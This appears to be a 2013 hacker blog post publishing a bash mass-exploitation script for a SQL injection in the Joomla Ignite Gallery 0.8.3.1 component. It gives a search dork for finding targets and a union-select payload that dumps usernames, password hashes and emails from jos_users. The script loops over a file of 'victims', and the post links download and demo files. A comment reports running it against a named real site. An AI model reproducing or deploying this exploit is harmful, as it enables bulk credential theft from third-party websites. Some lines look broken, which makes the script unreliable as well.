Tuesday, August 20, 2013

Joomla (com_ignitegallery) Remote Exploit

D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4 
#!/bin/bash
#Joomla (com_ignitegallery) Remote Exploit
#Dork: inurl:"option=com_ignitegallery"
#Coded By Red V!per
# D3m00 : http://www.mediafire.com/download/dxeob7as8bgozwo/Joomla-com_ignitegallery-remoot-exploit.mp4
#Tnx 2 : All Turkish && Persian Hackers

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"


if [[ $# != 1  ]]; then
  clear
  echo
  echo -e "$B  Joomla (com_ignitegallery) Remote Exploit - 240\n"
  echo -e " -=============================================-\n"
  echo -e "  Joomla Ignite Gallery 0.8.3.1 SQL Injection \n"
  echo  
  echo -e "  By Red Hat V!per\n"   
  echo -e " -=============================================-\n"  
  echo -e "   example: ./JCI-RE.sh targets.lst \n"
  echo -e "\n Run:$B ./JCI-RE.sh  $N\n"
  exit 1
fi

VICTIMS=$1    

clear
echo
echo -e "$B Joomla (com_ignitegallery) Remote Exploit [public] - 240\n"
echo -e " -===============================================-\n"
echo -e "   Joomla Ignite Gallery 0.8.3.1 SQL Injection "
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
echo -e "  [+] Checking :$B $VICTIMS"
echo


Exploit="%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activati​on%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9
088e8"

pars_respone()
{

keyword=`cat page.php | grep "[a-zA-Z0-9]:[0-9]"`
username=`echo "$keyword" | grep "
" | cut -d ':' -f 1 |sed -e 's/^[ \t]*//' | awk '{gsub("
","")}1'`
pass_1=`echo "$keyword" | grep "
" | cut -d ':' -f 2`
pass_2=`echo "$keyword" | grep "
" | cut -d ':' -f 3`
password="$pass_1:$pass_2"
email=`echo "$keyword" | grep "
" | cut -d ':' -f 4`

 echo -e "[~] $B Host     : $url_1=$url_2";
 echo -e "[~] $B Username : $username";
 echo -e "[~] $B Password : $password";
 echo -e "[~] $B Email    : $email"; 
 echo -e ""

}

pars_url()
{
 rm -rf page.php*
 url_1=`echo "$1" | cut -d '=' -f 1,2,3`
 url_2=`echo "$1" | cut -d '=' -f 4`

 url=""$url_1"=-"$url_2""$Exploit""

 wget -q -O page.php "$url" 
 pars_respone;
}

for trg in `cat $VICTIMS`
do
 pars_url $trg
done
Download Script : http://www.mediafire.com/view/c2kwa9cpm1m030d/joomla-remote-exploit.sh
Posted by at

1 comment:

  1. rootNovember 5, 2013 at 8:15 AM

    Not work..
    [~] Host : http://selenabg.com/index.php/index.php?option=com_ignitegallery&task=view&gallery=3
    [~] Username :
    [~] Password : :
    [~] Email :

    ./joomla: line 83: syntax error near unexpected token `newline'
    ./joomla: line 83: `'

    ReplyDelete

Subscribe to: Post Comments (Atom)